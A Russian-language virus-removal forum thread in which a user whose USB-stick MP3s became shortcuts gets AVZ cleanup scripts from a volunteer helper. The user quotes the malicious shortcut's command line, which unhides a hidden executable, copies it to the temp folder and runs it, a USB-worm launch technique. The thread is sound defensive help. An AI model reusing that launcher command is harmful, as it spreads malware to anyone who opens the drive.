Доброго времени суток. Файлы НА ФЛЕШКЕ из формата mp3 превратились в ярлыки размером в 2кб. При попытке их открыть через WMP появляется ошибка, но трек воспроизводится,кроме того в расположении всех файлов сказано :"C/Windows/system32".Еще при попытке открыть мой компьютер появляется окно "Управление компьютером" и приходится все открывать через поиск.Сканировал систему 3 антивирусными ПО( AVZ 4,SpyHunter4,Avira) - все обновлены и актуальны. Каждый из них что-то нашел и удалил или вылечил, но проблемы остались.Также просканировал как описано в вашей инструкции Dr.WebCureIt! в безопасном режиме (нашел 10 угроз), но проблема осталась.Полностью сделал как в вашей инструкции(Avir`у отключить не получилось), но не помогло,поэтому Спасите!Спасибо заранее.
P.S. не хочу чтоб меня считали дилетантом, все это дело рук племянников
Будь в курсе!Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
Уважаемый(ая) Стич, спасибо за обращение на наш форум!
Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитами АВЗ и HiJackThis, подробнее можно прочитать в правилах оформления запроса о помощи.
Информация
Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.
begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.' + #13#10 + 'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
then
begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
end;
QuarantineFile('C:\Users\Настя\AppData\Roaming\Microsoft\Windows\themes\Kpaeao.exe','');
QuarantineFile('C:\Users\Настя\AppData\Roaming\WindowsUpdate\Updater.exe','');
DeleteFile('C:\Users\Настя\AppData\Roaming\WindowsUpdate\Updater.exe','32');
DeleteFile('C:\Users\Настя\AppData\Roaming\Microsoft\Windows\themes\Kpaeao.exe','32');
RegKeyParamDel('HKEY_CURRENT_USER','Software\Microsoft\Windows\CurrentVersion\Run-','Kpaeao');
RegKeyParamDel('HKEY_CURRENT_USER','Software\Microsoft\Windows\CurrentVersion\Run-','Windows Update Installer');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
RebootWindows(false);
end.
Будет выполнена перезагрузка компьютера.
Выполните скрипт в AVZ
Код:
begin
CreateQurantineArchive('c:\quarantine.zip');
end.
c:\quarantine.zip пришлите по красной ссылке Прислать запрошенный карантиннад первым сообщением в Вашей теме.
Выполните правила ЕЩЕ РАЗ и предоставьте НОВЫЕ логи
Microsoft MVP 2012-2016 Consumer Security Microsoft MVP 2016 Reconnect
по прежнему при попытке открыть мой компьютер или флешку открывается управление компьютером.я зашел в реестр,не досчитался папок "HKEY_CLASSES_ROOT\Directory и \Folder".Файлы на флешке по прежнему в виде ярлыков
И еще в расположении файлов на флешке указано:"%ALLUSERSPROFILE%\..\..\windows\system32\ cmd.exe /c "%SystemRoot%\explorer.exe %cd% & attrib -s -h %cd%pOtAqTB.exe & xcopy /F /S /Q /H /R /Y %cd%pOtAqTB.exe %temp%\OCkYk\ & attrib +s +h %cd%pOtAqTB.exe & start %temp%\OCkYk\pOtAqTB.exe & exit""
Последний раз редактировалось Стич; 01.11.2015 в 10:51.
я и забыл про tcmd.есть,попробовал переименовать в нем один из файлов в mp3,вроде получилось)
Но теперь файлы не воспроизводятся ни в WMP ни в Winamp,ни в foobar2000,ни в AIMP.
Последний раз редактировалось Стич; 01.11.2015 в 14:07.
Действительно,вот онаСпасибо, что вы есть.Получается,что все в порядке?а как быть с теми файлами что остались на флешке(зараженные)?и как быть с "управленеие компьютером"?
Вылезает тоже самое.Сам разберусь,спасибо за помощь.
Разобрался,нужно было просто в реестре разобраться.Я вам порядком уже поднадоел наверно,но есть последний вопрос,эта зараженная флешка успела побывать на другом пк,мне проделать те же операции?
Последний раз редактировалось Стич; 03.11.2015 в 20:36.
Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru: